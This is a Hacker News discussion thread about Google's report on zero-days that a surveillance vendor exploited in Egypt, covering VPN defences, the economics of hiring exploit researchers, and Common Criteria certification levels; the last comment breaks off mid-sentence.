[HN Gopher] 0-days exploited by commercial surveillance vendor i...
       ___________________________________________________________________
        
       0-days exploited by commercial surveillance vendor in Egypt
        
       Author : mikece
       Score  : 280 points
       Date   : 2023-09-22 17:21 UTC (5 hours ago)
        
 (HTM) web link (blog.google)
 (TXT) w3m dump (blog.google)
        
       | aborsy wrote:
       | I'm not an expert, but wouldn't a VPN (commercial or to a server
       | with known exit IP) prevent such attacks? It will kick out the
       | MITM.
       | 
       | Also I wonder if Lockdown Mode could block it.
        
         | fullspectrumdev wrote:
         | Yes and also yes.
         | 
         | These attacks when launched by government entities pretty much
         | always rely on placing a box at the ISP that does the targeted
         | interception/MiTM against a subset of subscribers.
         | 
         | So using a VPN would ensure your traffic is tunnelled "beyond"
         | their reach.
         | 
         | Lockdown mode also would have prevented the iOS exploit chain,
         | apparently.
        
       | swordbeta wrote:
       | Is the commit containing the fix for the v8 bug 1473247
       | CVE-2023-4762 available anywhere?
        
       | mtu9001 wrote:
       | Some men just want to watch the world burn.
        
       | toasterblender wrote:
       | Here is what I do not understand:
       | 
       | Spyware firms and 0-day vendors both have staff dedicated to
       | finding 0-days. Why do Google and Apple not simply poach these
       | staff?
       | 
       | I am sure Google and Apple can offer very competitive salaries,
       | so why do they not do so? Is it because the cost of basically
       | poaching all of the skilled 0-day hunters is deemed to be greater
       | than the cost of just issuing patches?
        
         | OneLessThing wrote:
         | I am this person. I work as a researcher finding 0-days.
         | 
         | From the employee perspective: Wages are equal. Big Tech work
         | is less interesting (build big bug-finding machines that find
         | a high quantity of bugs), and the bugs you report sit in some
         | bug tracker only to maybe be fixed in 3 months. Offensive
         | security work is more interesting. It requires intimate
         | knowledge of the systems you research, since you only need a
         | handful and the shallow ones get found by Big Tech. You must go
         | deep. Additionally offensive security requires the know-how to
         | go from vulnerability to code execution. Exploitation is not an
         | easy task. I can't explain why engineers work for companies
         | that I deem immoral, but that's probably because they don't
         | feel the same way as I do.
         | 
         | From the employer perspective: How much does the rate of X
         | vulnerabilities per year cost me? If our code has bugs but is
         | still considered the securest code on the market, it may not
         | benefit the company to increase the security budget. If the
         | company expands the security budget then which division is
         | getting cut because of it, and what is the net result to the
         | company health?
         | 
         | If you want to fix the vulnerabilities you need to make the
         | price of finding and exploiting them higher than the people
         | buying them can afford. And you must keep the price higher as
         | advances in offensive security work to lower the price of
         | finding and exploiting them. Since defensive companies don't
         | primarily make money from preventing bugs and offensive
         | companies do primarily make money by finding bugs, there is a
         | mismatch. The ultimate vulnerability in a company, or any
         | entity, is finite resources.
        
         | rehitman wrote:
         | There is also a chance at play here. Many people are trying to
         | find a hole, and some are luckier than others. Google has a
         | great team, so they get lucky more, that is why these things
         | are not too common, but at some point a bad guy gets lucky too,
         | even though he is not the smartest in the room.
        
         | jklinger410 wrote:
         | They probably don't want to hire criminals to work at their
         | companies.
        
           | ziftface wrote:
           | Already very well-paid criminals for that matter
        
           | [deleted]
        
         | callalex wrote:
         | Because that would eat into profit margins, and at the end of
         | the day very very few paying customers actually make their
         | purchasing decisions based on security. On top of that almost
         | nobody is really knowledgeable enough to make an informed
         | decision in the first place. So the money doesn't get spent.
        
         | tetrep wrote:
         | I think this is similar to looking at the budget of the US
         | government and asking why they don't simply pay off all the
         | potential criminals such that most crime in the US is then
         | mitigated.
        
           | callalex wrote:
           | That's not equivalent at all. Paying off criminals creates an
           | incentive for there to be more criminals. Paying more
           | security researchers does not incentivize people writing
           | buggy C code to write even buggier C code.
        
         | crtified wrote:
         | It's a good idea, but in some ways, akin to the challenge that
         | would be presented by attempting a similar-veined " _why
         | doesn't the world's richest country just hire all the world's
         | best military generals, leaving zero for any other country?_".
         | 
         | The reasons why it's not possible are myriad, but boil down to
         | the fact that the world and humanity are very big things, and
         | one entity can't possibly get them all, or even most of them.
         | There's too much diverse heterogeneity built into everything.
         | Including many worldviews and loyalties that go beyond money.
        
         | entuno wrote:
         | Some of them wouldn't want to work for Google and Apple in the
         | first place, regardless of the salary.
         | 
         | But while they could try and poach them today, tomorrow there
         | will be a whole load of new people working for those companies,
         | and it'll just be a never-ending cycle.
        
           | cco wrote:
           | > Some of them wouldn't want to work for Google and Apple in
           | the first place, regardless of the salary.
           | 
           | For moral reasons do you mean? I would be surprised to learn
           | there are a lot of people that are open to selling 0 day
           | exploits to "bad actors" (granted that this term is doing a
           | lot of heavy lifting here), but wouldn't want to work for
           | Google or Apple.
           | 
           | > ...it'll just be a never-ending cycle
           | 
           | I think the idea is you pay them so well that they can work
           | for a handful of years and remove any cash incentive reason
           | for them to continue selling 0 days to bad actors.
        
             | eastbound wrote:
             | > "bad actors", but wouldn't want to work for Google or
             | Apple
             | 
             | - Everyone who doesn't like US hegemony. That's just about
             | everywhere outside the US, in varying proportions: even in
             | Europe, and even more so in the Middle East,
             | 
             | - Everyone who doesn't like monopolies. Capitalism of
             | competition (as opposed to state capitalism, when the state
             | borrows a trillion per semester, ahem) requires that
             | monopolies be broken down to avoid distortion of
             | competition. Helping bad actors can be, under their
             | viewpoint, less bad than the damage done to a billion
             | consumers at a time. Plus monopolies impose a
             | monoculture of occidentalism, with certain values that a
             | firm in Egypt might consider worse than sponsoring bad
             | actors.
        
               | toasterblender wrote:
               | If the number of skilled 0-day hunters who will work for
               | a paycheck is > 0, then yours is a moot point, since a
               | poaching program would still make an impact even if there
               | are some people who work for spyware companies who would
               | not work for FAANG.
               | 
               | I think you will also find that morals for many people
               | are inversely proportional to the offered salary. An
               | 0-day developer being compensated $130k may well abandon
               | their particular morals if offered a $240k salary
               | instead.
        
           | toasterblender wrote:
           | > But while they could try and poach them today, tomorrow
           | there will be a whole load of new people working for those
           | companies, and it'll just be a never-ending cycle.
           | 
           | The number of people who successfully find 0-click 0-days for
           | iOS/Android is very small. It's not a vastly replenishable
           | resource.
        
             | hattmall wrote:
             | It's a small group but a wide pool. It's not like the same
             | person finds 10 0days. And until they do find their one
             | exploit most of them have pretty much no credentials at
             | all. So how do you avoid hiring 10,000 up and comers that
             | never actually come up?
        
               | toasterblender wrote:
               | The same way it works in any other industry: by hiring
               | those with proven track records, the best of the best.
               | The goal is obviously not to hire 100% of the potential
               | 0-day hunters, but by launching a concentrated poaching
               | effort, to make a sufficient dent.
        
               | throwaway38475 wrote:
               | People have said Apple can buy companies like NSO for
               | less than they probably spend on SIEMs in a year. But as
               | soon as they do that there will be another startup doing
               | the same thing.
               | 
               | The company (Grayshift) that broke the secure enclave had
               | ex-Apple security engineers working for them.
        
               | entuno wrote:
               | They could certainly go out and try and hire some of the
               | best iOS vuln researchers. But if they hire the top 10 out
               | there, then #11 gets a massive payrise to go and work for
               | one of the spyware companies.
               | 
               | And if Apple is paying huge amounts of money and getting
               | into bidding wars with all the other companies out there
               | for vuln researchers, that'll attract a load more people
               | to start hunting.
        
         | jrvarela56 wrote:
         | Isn't this akin to asking why Google and Apple end up acquiring
         | companies at very high prices if they could just hire the
         | founders and have them build the products in-house?
        
           | toasterblender wrote:
           | Poaching founders is an entirely different kettle of fish
           | than just poaching line employees.
        
             | jrvarela56 wrote:
             | Oh, I thought finding these vulns was a highly open-ended
             | endeavor with variable payouts.
        
               | fullspectrumdev wrote:
               | It depends. Some companies that buy exploits have public
               | "price lists" for acquisitions.
               | 
               | 100k+ for a Safari on iOS code exec, another 200k for the
               | Safari sandbox escape, then another 500k+ for the kernel
               | exploit?
               | 
               | A full chain is real money. Especially when they resell
               | this ability for 1-2M+ per user.
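                | 
                | Back-of-the-envelope, using the purely illustrative
                | figures above (labels are just placeholders):
                | 
                |   parts = {
                |       "renderer_rce": 100_000,
                |       "sandbox_escape": 200_000,
                |       "kernel_exploit": 500_000,
                |   }
                |   chain_cost = sum(parts.values())
                |   per_sale = 1_500_000   # "1-2M+ per user"
                |   print(chain_cost, per_sale - chain_cost)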
        
           | toxik wrote:
           | Google absolutely "poaches" promising startup devs tbh.
        
         | alephnerd wrote:
         | > Why do Google and Apple not simply poach these staff
         | 
         | They do. Plenty of white hat teams hire 8200 vets, but
         | sometimes they'd rather make their own company instead of being
         | a cog within an amorphous foreign corporation.
        
           | FirmwareBurner wrote:
           | This. IIRC some famous security researcher responsible for
           | iOS jail-breaks was poached by Apple only to leave after 3
           | months.
           | 
           | Successful and skilled security people with a proven track
           | record don't have the patience to put up with the charade
           | such large orgs require.
        
             | reqo wrote:
             | George Hotz
        
         | icelancer wrote:
         | Money is just one input for why people choose to work at
         | certain places.
        
         | kramerger wrote:
         | Google has one of the best teams money and prestige can buy:
         | 
         | https://en.m.wikipedia.org/wiki/Project_Zero
         | 
         | They also have excellent collaboration with independent
         | researchers across the world. But given how much software is
         | written everyday, they can still miss some issues.
        
           | toasterblender wrote:
           | Project Zero is amazing, but they 1) seem like a very small
           | team, and 2) their mandate is far too broad (essentially to
           | search for 0-days in anything, versus a specific system).
           | What I am talking about is more like Apple having a dedicated
           | team of 10 vulnerability researchers all looking into iOS
           | 0-days fulltime.
        
             | throwaway38475 wrote:
             | They all do that. I've been in Offensive Security for 10+
             | years with several spent at FAANGS, and not only do they
             | all have large security teams doing internal testing, they
             | hire multiple contractors like Trail-of-Bits to audit every
             | important service continuously throughout the year.
             | 
             | Apple has way more than 10 full time researchers looking at
             | iOS all day, trust me :). They also have a really generous
             | bug bounty. There are always bugs though.
        
               | kramerger wrote:
               | > Apple has way more than 10 full time researchers
               | looking at iOS all day.
               | 
               | Yes
               | 
               | > They also have a really generous bug bounty.
               | 
               | Hell no
        
               | tholdem wrote:
               | Agree. Not long ago, Apple used to sue people reporting
               | vulnerabilities to them. Imagine punishing people doing
               | free work for you. Not a good look.
        
               | 77pt77 wrote:
               | Getting punished is the default.
               | 
               | If you ever come across anything, keep your mouth shut.
        
               | lima wrote:
               | Not only is it not generous (relatively speaking), but
               | actually getting paid can be extremely annoying.
               | 
               | Used to be even worse.
        
         | toxik wrote:
         | I think it's many factors.
         | 
         | 1. They do to some extent.
         | 
         | 2. Which researchers are you going to hire? Lemon market,
         | whoever wants to be hired is more likely a lemon.
         | 
         | 3. Freelancing grayhat stuff is very rock n roll.
         | 
         | 4. I bet they try to hire some, and then the square and
         | inflexible large corpo hiring process is just absolutely unfit
         | for hiring such a person.
        
           | fullspectrumdev wrote:
           | > Which researchers are you going to hire? Lemon market,
           | whoever wants to be hired is more likely a lemon.
           | 
           | Not really. Most people in that space who have a "day job"
           | are almost always open to being hired for better
           | TC/benefits/more interesting problems.
           | 
           | Points 3 & 4 are largely correct.
           | 
           | It's very rock and roll, but a very unstable income and most
           | of the brokerages are comically untrustworthy. Also you may
           | develop a conscience and find it hard to sleep at night.
           | 
           | Point 4... usually the people who can find such bugs reliably
           | don't work well in large corps past the short term. The
           | unexplained gaps in a CV also aren't conducive to getting
           | past HR easily.
        
         | tagawa wrote:
         | It's not just money that motivates.
        
         | saagarjha wrote:
         | Poach them to do what? There's not much use to Apple or Google
         | to have an implant developer around, and just having them do
         | nothing is likely to be frustrating if the corporate lifestyle
         | wasn't enough already.
        
           | toasterblender wrote:
           | > Poach them to do what?
           | 
           | Poach them to discover 0-days in their software, as I said.
        
             | saagarjha wrote:
             | That's not what implant developers do.
        
         | permo-w wrote:
         | who's to say they're not doing this? there are a lot of
         | security companies and researchers in the world though
         | 
         | or alternatively: as lovely as the hacker -> employee fairytale
         | sounds, a certain % of the "I would never work for
         | Google/Apple" types would come in with the sole purpose of
         | installing backdoors from the inside
        
           | fullspectrumdev wrote:
           | A lot of the really good hackers won't pass HR screening, or
           | be able to cope with corporate bullshit beyond a year.
           | 
           | So there's also that.
        
         | trollian wrote:
         | These exploits are weapons. Look at what governments pay for
         | weapons. That's hard to compete with.
        
       | boothemoo wrote:
       | This vulnerability was most probably used by the Egyptian
       | authorities to hack the mobile phone of the presidential
       | candidate Ahmed El Tantawy who is competing with the current
       | president Abdel Fatah El Sisi for the presidency.
       | 
       | https://x.com/jsrailton/status/1705271600868692416?s=46&t=Kq...
        
       | mrwnmonm wrote:
       | [dead]
        
       | Veserv wrote:
       | Just your regular reminder that for the only security
       | certification that Apple advertises on their website for iOS
       | [1][2] Apple only achieved the lowest possible level of security
       | assurance, EAL1. A level only fit for products where [3]: "some
       | confidence in the correct operation is required, but the threats
       | to security are not viewed as serious" which does not even
       | require "demonstrating resistance to penetration attackers with a
       | basic attack potential" [4]. This is four entire levels lower
       | than "demonstrating resistance to penetration attackers with a
       | moderate attack potential" [5].
       | 
       | Apple has never once, over multiple decades of failed attempts,
       | demonstrated "resistance to penetration attackers with a moderate
       | attack potential" for any of their products. To be fair, neither
       | has Microsoft, Google, Amazon, Cisco, Crowdstrike, etc. It should
       | be no surprise that the companies, processes, and people who lack
       | the ability, knowledge, and experience to make systems resistant
       | to moderate attackers despite nearly unlimited resources are
       | regularly defeated by moderate attackers like commercial
       | surveillance companies. Their own certifications say that they
       | absolutely, 100% can not.
       | 
       | [1] https://support.apple.com/guide/certifications/ios-
       | security-...
       | 
       | [2]
       | https://support.apple.com/library/APPLE/APPLECARE_ALLGEOS/CE...
       | 
       | [3]
       | https://www.commoncriteriaportal.org/files/ccfiles/CC2022PAR...
       | Page 14
       | 
       | [4]
       | https://www.commoncriteriaportal.org/files/ccfiles/CC2022PAR...
       | Page 16
       | 
       | [5]
       | https://www.commoncriteriaportal.org/files/ccfiles/CC2022PAR...
       | Page 20
        
         | kramerger wrote:
         | Isn't EAL1 what you get for just showing up?
         | 
         | Basically, here is the product. Here are some design documents.
         | We don't have anything more. Can we get our EAL1 please?
        
           | Veserv wrote:
           | Yup. Want to have a laugh? Here is the Apple iOS
           | certification report [1].
           | 
           | On PDF page 26 (document page 21) they describe the rigorous
           | AVA_VAN.1 vulnerability analysis certification process they
           | faced. The evaluation team basically typed in: "ios
           | vulnerabilities" into Google and then typed in "ios iphone"
           | into the NVD and verified that all of the search results were
           | fixed. AVA_VAN.1 certification please.
           | 
           | To explain why, AVA_VAN.1 does not require an independent
           | security analysis, it only requires a survey of the public
           | domain for known vulnerabilities [2]. You need AVA_VAN.2
           | (which is only required in EAL2 and EAL3) before they
           | actually attempt to look for vulnerabilities themselves.
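           | 
           | To spell out how low that bar is: the AVA_VAN.1 "public
           | domain survey" is, in spirit, a few lines of Python. A
           | sketch against what I believe is the NVD 2.0 REST API (the
           | keywordSearch parameter name is from memory, so treat it as
           | an assumption):
           | 
           |   import json, urllib.parse, urllib.request
           | 
           |   base = "https://services.nvd.nist.gov/rest/json/cves/2.0"
           |   params = {"keywordSearch": "ios iphone",
           |             "resultsPerPage": 20}
           |   url = base + "?" + urllib.parse.urlencode(params)
           |   # List publicly known CVEs matching the keywords.
           |   with urllib.request.urlopen(url) as resp:
           |       data = json.load(resp)
           |   for item in data.get("vulnerabilities", []):
           |       print(item["cve"]["id"])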
           | 
           | [1] https://www.commoncriteriaportal.org/files/epfiles/st_vid
           | 112...
           | 
           | [2] https://www.commoncriteriaportal.org/files/ccfiles/CC2022
           | PAR... Page 154
        
         | wepple wrote:
         | There is a near zero chance that being EAL4 or higher certified
         | would've prevented these attacks.
         | 
         | CC might be better than PCI-DSS, but not by much.
        
         | [deleted]
        
         | manuelabeledo wrote:
         | > Apple has never once, over multiple decades of failed
         | attempts, demonstrated "resistance to penetration attackers
         | with a moderate attack potential" for any of their products. To
         | be fair, neither has Microsoft, Google, Amazon, Cisco,
         | Crowdstrike, etc.
         | 
         | So, OK I guess?
         | 
         | It's worth noting that CC evaluation does not score the actual
         | practical security of a device or system, but the level of
         | testing it was submitted to, which is consistent with pretty
         | much every single governmental certification out there.
        
           | Veserv wrote:
           | Sure it does, it is just that EAL4+, the highest level any of
           | them can reach, does not certify "resistance to penetration
           | attackers with a moderate attack potential". Guess what,
           | commercial hackers have "moderate attack potential".
           | 
           | You are complaining that the 40 cm high jump test does not
           | score actual jumping ability. You are right, it is a low bar
           | that they should all be able to pass. You can not use the 40
           | cm high jump test to distinguish them. What you need to do is
           | use the 100 cm high jump test. Some can pass it, but none of
           | the large commercial vendors can. Sure, it would be nice if
           | we had more gradations like the 60 cm and 80 cm tests, but we
           | do not really know how to do that, so the best we can do is
           | the 100 cm test.
        
             | manuelabeledo wrote:
             | I'm not really complaining, though. I'm just saying that
             | security certifications are more about compliance than
             | actual proof that a system cannot be easily compromised. In
             | other words, they are more about legal requirements than
             | guarantees.
             | 
             | It is also misleading to assert that a device or a system
             | is _less_ secure because it hasn't been certified. Vendors
             | submit requests to validate _against specific levels or
             | certifications_, and it is not the goal of the
             | certification authority to determine "how high" they score.
        
               | Veserv wrote:
               | They _can not_ certify against useful assurance levels.
               | They have tried repeatedly for decades and spent huge
               | gobs of money. It is not a choice, they are incapable of
               | it.
               | 
               | I am judging them by their maximum ability ever
               | demonstrated under the most favorable circumstances and
               | they still can not certify resistance against moderate
               | attackers. They have never developed systems that can
               | protect against the prevailing threat landscape and they
               | can not develop such systems. Their best is not good
               | enough.
        
         | vuln wrote:
         | Do you by any chance have this data on Google, Samsung, Huawei,
         | LG, and other cell phone manufacturers? I've never looked into
         | these certifications and I wouldn't know where to start
         | looking. Do the above companies publish the results like Apple?
        
           | Veserv wrote:
           | Sure. The Common Criteria for Information Technology Security
           | Evaluation [1] is the foremost internationally recognized
           | standard (ISO 15408) for software security that most large
           | companies certify against for at least some of their product
           | portfolio. I believe there are US government procurement
           | requirements to that effect, so many systems will have
           | certifications of some form.
           | 
           | For many companies you just search: "{Product} Common
           | Criteria" and they will usually have a page for it on their
           | website somewhere.
           | 
           | You can also go directly to the certified products page:
           | https://www.commoncriteriaportal.org/products/
           | 
           | For smartphones you can see them there under "Mobility".
           | 
           | Unfortunately, it is fairly hard to parse if you are not
           | familiar with the terminology. The general structure of
           | Common Criteria certifications is Security Functional
           | Requirements (SFR) which are basically the specification of
           | what the product is supposed to do and the Security Assurance
           | Requirements (SAR) which are basically how you certify the
           | SFRs are met (and what level of assurance you can have that
           | the SFRs are met). SARs can be bundled into Evaluation
           | Assurance Levels (EAL) which define collections that
           | reasonably map to levels of confidence. You can add SARs
           | beyond the current EAL which is how you get an EAL level with
           | a +, but it is important to keep in mind that just cherry
           | picking certain SARs does not necessarily give you a holistic
           | assurance improvement.
           | 
           | SARs and SFRs can be further pre-bundled into Protection
           | Profiles (PP) which basically exist to provide pre-defined
           | requirements and testing methodologies instead of doing it
           | one-off every time. Some Protection Profiles support variable
           | EAL/SAR levels, but these days people generally just certify
           | against a Protection Profile with a fixed SAR bundle. This is
           | what PP Compliant means. If you want to see what they
           | certified against, you would need to look at the Protection
           | Profile itself.
           | 
           | For smartphones, the standard Protection Profile for the
           | phone itself is Mobile Device Fundamentals. If you look at
           | the SAR bundle there you will see that they correspond to
           | EAL1 + a small number of EAL2, resulting in an overall level
           | of EAL1+. As they are in-between EAL1 and EAL2 I just
           | classified it as EAL1 for my earlier post. If you peruse
           | further you will see that basically every Protection Profile
           | that companies certify to as PP Compliant are basically the
           | same EAL1+ or thereabouts. So, if you see PP Compliant, it
           | probably means EAL1+ or so.
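           | 
           | If it helps when reading those listings: the SAR that
           | decides what attacker strength is actually certified is the
           | AVA_VAN component. A tiny lookup table (simplified and
           | partly from memory, so treat the exact EAL cutoffs as
           | approximate):
           | 
           |   # AVA_VAN level -> (what it certifies,
           |   #                   lowest EAL package that includes it)
           |   AVA_VAN = {
           |       1: ("public-domain vuln survey only", 1),
           |       2: ("independent analysis, basic attacker", 2),
           |       3: ("focused analysis, enhanced-basic attacker", 4),
           |       4: ("methodical analysis, moderate attacker", 5),
           |       5: ("advanced methodical, high attacker", 6),
           |   }
           | 
           |   def describe(level: int) -> str:
           |       what, min_eal = AVA_VAN[level]
           |       return f"AVA_VAN.{level}: {what} (EAL{min_eal}+)"
           | 
           |   # Mobile Device Fundamentals PP sits at AVA_VAN.1,
           |   # i.e. the "EAL1+" bucket described above.
           |   print(describe(1))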
           | 
           | Hope that helps.
           | 
           | [1] https://www.commoncriteriaportal.org/cc/
        
           | selectodude wrote:
           | https://www.commoncriteriaportal.org/products/index.cfm?
           | 
           | Generally only components are EAL certified. For example, the
           | iPhone is not on there, but the security protecting access to
           | Apple Pay on the iPhone 13 with A15 Bionic running iOS 15.4.1
           | (19E258) is EAL2+.
        
           | alephnerd wrote:
           | You as a private consumer wouldn't be able to buy one of
           | these EAL4+ products without a relationship with a defense
           | and security oriented reseller.
        
         | alephnerd wrote:
         | > neither has Microsoft, Google, Amazon, Cisco, Crowdstrike,
         | etc. It should be no surprise that the companies, processes,
         | and people who lack the ability, knowledge, and experience to
         | make systems resistant to moderate attackers
         | 
         | Companies create a separate SKU for products that meet higher
         | levels of security assurance for Common Criteria. I know for a
         | fact that the companies you listed offer SKUs that meet higher
         | EAL levels (EAL4+) for Common Criteria. You just gotta pay more
         | and purchase via the relevant Systems Integrators.
         | 
         | A consumer product line like the Apple iPhone isn't targeting
         | DoD buyers. That's always been Blackberry Ltd's bread and
         | butter
        
           | Veserv wrote:
           | I said, "resistance to penetration attackers with a moderate
           | attack potential". EAL5 is the first level at which you must
           | demonstrate that as can be seen in my 5th link [1] which
           | bolds the diffs from the previous level.
           | 
           | None of those companies has ever once certified a product to
           | that level as far as I am aware. The failure is so complete
           | that it is generally viewed as impossible to fix the
           | structural defects in products that failed an EAL5
           | certification without a total rewrite. It used to say that in
           | the standard somewhere, but the standard revisions have moved
           | it so I can not quote it directly.
           | 
           | [1] https://www.commoncriteriaportal.org/files/ccfiles/CC2022
           | PAR... Page 20
        
             | alephnerd wrote:
             | Going EAL5 and above doesn't make sense from a cost to
             | security ratio UNLESS the customer is open to paying more
             | for that level of verification.
             | 
             | Certain agencies and bureaus within the DoD do ask for this
             | and pay for it, but most are good enough with EAL4.
             | 
             | Most attacks can be resolved by following the bare minimum
             | recommendations of the MITRE ATT&CK framework (marketing
             | buzzwords aside).
             | 
             | Least Privileged Access, Entitlement Management, Identity
             | Enforcement, etc. are all much easier wins and concepts that
             | haven't been tackled yet.
             | 
             | Companies will provide EAL5+ if the opportunity is large
             | enough, but it won't be publicized. Iykyk. If not, chat
             | with your SI.
        
               | Veserv wrote:
               | No. The US government briefly had procurement
               | requirements for high security deployments.
               | 
               | They were forced to relax them because Microsoft could
               | not make bids that met the minimum requirements for DoD
               | and high security projects and that made their Senators
               | mad. They relaxed them to EAL4+ because that was the most
               | that Microsoft could do.
               | 
               | They since relaxed them further to EAL2 because that is
               | all that most large AV and cybersecurity appliance vendors
               | could achieve. They justified it under the "swiss cheese"
               | model where if you stack multiple EAL2 then you get EAL4
               | overall, which is insane. The government has since
               | relaxed them even further since none of the companies
               | want to do any certification since none of them can
               | achieve a decisive edge over the others that they can
               | write into the requirements thus disqualifying their
               | competition, so certification is just a zero-sum game.
        
               | kramerger wrote:
               | EAL5 is mainly about having a semi-formal description
               | and for 6-7 you also need formal verification.
               | 
               | Outside some very limited cases, we don't have the tools
               | to go there yet. EAL4+ is what people should aim for.
        
               | Veserv wrote:
               | EAL4+ is useless against the prevailing threat actors as
               | can be seen time and time again. There is no point at
               | aiming for inadequate; even if you get there you still
               | get nothing.
               | 
               | EAL6-7 certifications are basically the only known,
               | existing certifications that have any evidence supporting
               | that they are adequate to defend against the known and
               | expected threats. As far as I am aware, there are no
               | other certifications even able to distinguish products
               | that can viably protect against organized crime and
               | commercial spyware companies. Existing products max out
               | every other certification and we know for a fact those
               | products are ineffective against these threat actors.
               | Therefore, we can conclude that those certifications are
               | useless for identifying actual high security products
               | adequate for the prevailing threat landscape.
               | 
               | Sure, if we had some other certification that could
               | certify at that level and was more direct, that would be
               | nice. But we do not, the only ones that we know to work
               | and that products have been certified against are Common
               | Criteria EAL6-7 (and maybe EAL5). We can either choose
               | certifications that are cheap and do not work, or ones
               | that work. Then, from the ones that work, we can maybe
               | relax the requirements carefully to identify useful
               | intermediate levels, or identify if some of the
               | requirements are excessive and unnecessary for achieving
               | the desired level of assurance.
               | 
               | However, the key takeaway from this is not whether we can
               | certify products to EAL5 and higher or whether those
               | certifications work or the cost-benefit of that
               | certification process. The key takeaway is that EAL4 is
               | certainly inadequate. Any product in commercial use
               | targeting that level or lower is doomed to be useless
               | against the threat actors who we know will attack it.
        
               | insanitybit wrote:
               | I feel like you're arguing that these certifications are
               | useless and uncorrelated with security but then you're
               | trying to say that Apple and others are bad for not
               | having them.
        
               | Veserv wrote:
               | Low certification levels certify low levels of security.
               | High certification levels certify high levels of
               | security.
               | 
               | EAL4 is known to be too low against modern threats that
               | will attack commercial users. We know this from
               | experience where EAL4 systems are routinely defeated.
               | Higher certification levels, such as the SKPP at EAL6/7,
               | are known to be able to resist against much harder
                | threats such as state actors like the NSA (defeating an
                | NSA penetration test was an explicit requirement tested in
               | the SKPP by the NSA themselves).
               | 
               | Low certification levels, like EAL4 and lower, that are
               | the limit of the abilities of companies such as Apple and
               | Microsoft are known to be useless against commercial
               | threats. They are uncorrelated with protection against
               | commercial threats because they are inadequate in much
               | the same way that having a piece of paper in front of you
               | is uncorrelated with surviving a gunshot. Systems that
               | can only be certified to EAL4 and lower are certifiably
               | useless.
        
               | insanitybit wrote:
               | > Low certification levels certify low levels of
               | security. High certification levels certify high levels
               | of security.
               | 
               | I guess I don't know enough to say but I just doubt that,
               | knowing what I know about other certifications. I expect
               | that they're perhaps lightly correlated with security.
        
               | kramerger wrote:
               | > EAL4+ is useless against the prevailing threat actors
               | 
               | Hold on a second. Assurance level is about, well, level
               | of assurance the developers can provide. It is in most
               | cases just paperwork.
               | 
               | CC has a different mechanism to define attacker
                | capability & resources (can't recall what it's called) and
               | set the security goals accordingly
        
               | Veserv wrote:
               | The AVA_VAN (vulnerability analysis) Security Assurance
               | Requirement (SAR). AVA_VAN.4 requires "resistance to
               | penetration attackers with a moderate attack potential".
               | AVA_VAN.4 is only required for EAL5 and higher.
               | 
               | You could individually incorporate a higher AVA_VAN into
                | a lower EAL as an augmentation, but few do that. You also
               | do not get any of the other conformance assurances that a
               | higher EAL gives you. There is a reason we use EAL as a
               | whole instead of just quoting the AVA_VAN at each other.
               | 
               | Though maybe you are talking about the Security
               | Functional Requirements (SFR) which define the security
               | properties of your system? That is somewhat orthogonal.
               | You have properties and assurance you conform to the
               | properties. Conformance more closely maps to "level of
               | security" as seen in the AVA_VAN SAR. However, the
               | properties are just as important for the usage of the
               | final product because you might be proving you absolutely
               | certainly do nothing useful.
        
         | dang wrote:
         | Please don't post "regular reminder" style comments - they're
         | too generic, and generic discussion is consistently less
         | interesting. Good threads require being unpredictable. The best
         | way to get that is to respond to specific new information in an
         | article.
         | 
         | https://news.ycombinator.com/newsguidelines.html
        
         | insanitybit wrote:
         | I mean, it occurs to me that maybe _all of these companies_
       | aren't doing this for a reason - because common criteria and
         | compliance are often stupid and don't represent real security.
         | Perhaps these policies are the exception? But I've managed SOC2
         | for example and I can definitely say that there are plenty of
         | ways to get your SOC2 without giving a shit about actual
         | security.
        
           | Veserv wrote:
           | They failed. Repeatedly. For decades. They spent billions
         | trying. They failed so much that the standard writers
           | determined the only logical conclusion is that it must be
           | practically impossible to retrofit a system that failed EAL5
           | certification to achieve EAL5 or higher certification without
           | a complete rewrite and redesign. It says so right there in
           | the standard [1]: "EAL4 is the highest level at which it is
           | likely to be economically feasible to retrofit to an existing
           | product line". That was added due to the decades of
           | experience where everybody who ever tried to do that failed
           | no matter how much time or money they spent.
           | 
           | We also have plenty of evidence that it does matter, they
           | just can not do it. Here is Google touting their Common
           | Criteria certification for the Titan M2 security chip
           | hardware which is EAL4 + AVA_VAN.5 (resistance against
           | penetration attackers with a high attack potential) [2]. Note
           | that this is only the hardware (software was not certified; a
           | critical severity vulnerability was actually disclosed in the
           | software allowing complete takeover if I remember correctly)
           | and only cherry picks AVA_VAN.5 so is still only EAL4, not a
           | holistic EAL6 certification. Getting that certification was a
           | deliberate effort and cost. If they literally did not care
           | about the Common Criteria then they would just certify to the
           | checkbox level like everybody else. It is because they could
           | certify it to a higher level than most other can achieve that
           | they chose to do it because then they could tout their unique
           | advantage.
           | 
           | Basically everybody gets a certification and basically
           | everybody displays their certification on their page. There
         | is something to be said about them opting for an EAL1 over an
         | EAL4. It is basically assumed that any serious vendor could
         | probably get an EAL4 with some effort. So, there is no
         | differential advantage to displaying an EAL4 since everybody
           | could get it. It is just a zero-sum game to pay for
           | certification if everybody knows nobody has a true advantage.
           | However, if you can achieve EAL5 or higher, then you do have
           | a unique advantage because basically nobody else can do it.
           | The fact that none of the major vendors attempts EAL5, shows
           | that they can not do it.
           | 
           | [1] https://www.commoncriteriaportal.org/files/ccfiles/CC2022
           | PAR... Page 18
           | 
           | [2] https://security.googleblog.com/2022/10/google-
           | pixel-7-and-p...
        
       | account-5 wrote:
       | I've a question. This 0-day is a 0-click that didn't require any
       | document download or anything. Simply visiting an http site would
       | do it. What if you have JavaScript disabled by default? Would
       | this exploit still work?
        
         | bananapub wrote:
         | it's http interception so no, I doubt javascript matters at all
        
           | lucb1e wrote:
           | Without knowing more, that's a bit of an assumption. The
           | vulnerability could be in image decoding, in which case an
           | <img> tag is enough and no scripting is needed, but it could
           | also very well require doing something funky with JavaScript.
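           | 
           | For a rough sense of what still gets fetched and decoded
           | with JS off, something like this stdlib-only sketch lists
           | the subresources a page pulls in regardless of scripting
           | (example.com is just a placeholder):
           | 
           |   import urllib.request
           |   from html.parser import HTMLParser
           | 
           |   class NoScriptLoads(HTMLParser):
           |       # Tags whose targets load without any JS running.
           |       TAGS = {"img": "src", "link": "href",
           |               "source": "src", "video": "src"}
           | 
           |       def handle_starttag(self, tag, attrs):
           |           wanted = self.TAGS.get(tag)
           |           for name, value in attrs:
           |               if name == wanted and value:
           |                   print(tag, value)
           | 
           |   with urllib.request.urlopen("http://example.com") as r:
           |       html = r.read().decode("utf-8", "replace")
           |   NoScriptLoads().feed(html)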
        
       | bingobongodude wrote:
       | I am pretty sure I was hit with this. I had some REALLY weird
